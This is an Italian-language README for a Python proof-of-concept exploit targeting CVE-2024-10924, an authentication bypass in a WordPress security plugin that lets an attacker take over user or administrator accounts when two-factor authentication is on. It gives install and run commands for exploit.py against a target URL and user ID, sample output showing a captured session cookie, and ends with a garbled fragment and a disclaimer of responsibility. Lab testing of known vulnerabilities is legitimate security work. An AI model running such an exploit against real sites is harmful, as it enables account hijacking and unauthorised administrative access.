
POC per CVE-2024-10924 scritto in Python
Una falla nella gestione degli errori nell'API REST del plugin WordPress Really Simple Plugins (versioni comprese tra 9.0.0 e 9.1.1.1 incluse) permette a un attaccante, quando l'autenticazione a due fattori è abilitata, di bypassare l'autenticazione e prendere il controllo di un account utente o amministratore esistente.
Dato che sono un bravo ragazzo, troverai anche la versione 9.1.1.1 del plugin. Basta decomprimere e caricarlo nella cartella wp-content/plugins. Non dimenticare di attivare il plugin e abilitare la 2FA.
Installa le dipendenze richieste usando pip:
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
Con un ID utente specifico:
python exploit.py -id 10 http://localhost:8886/
Questo invia il payload di exploit con un ID utente di 10.
Senza specificare l'ID utente:
python exploit.py http://localhost
Imposta l'ID utente predefinito a 1.
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False) solo se necessario per il test.Non lo so ma non sono responsabile di nulla.